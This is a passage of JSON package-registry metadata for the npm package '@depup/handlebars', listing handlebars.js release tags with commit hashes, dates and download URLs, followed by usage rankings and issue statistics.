lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.5beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0.beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@0.9.0.pre.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2026-07-19T22:22:27.471Z","dependent_packages_count":0,"downloads":34,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":22.530291758948266,"dependent_packages_count":32.47518316932033,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.5027374641343},"purl":"pkg:npm/%40depup/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@depup/handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@depup/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@depup/handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-07-10T08:00:54.096Z","issues_count":161,"pull_requests_count":133,"avg_time_to_close_issue":20524950.96153846,"avg_time_to_close_pull_request":16796463.59090909,"issues_closed_count":104,"pull_requests_closed_count":88,"pull_request_authors_count":53,"issue_authors_count":142,"avg_comments_per_issue":3.111801242236025,"avg_comments_per_pull_request":1.699248120300752,"merged_pull_requests_count":57,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":32,"past_year_avg_time_to_close_issue":1112205.857142857,"past_year_avg_time_to_close_pull_request":822488.2222222222,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":18,"past_year_pull_request_authors_count":16,"past_year_issue_authors_count":17,"past_year_avg_comments_per_issue":1.263157894736842,"past_year_avg_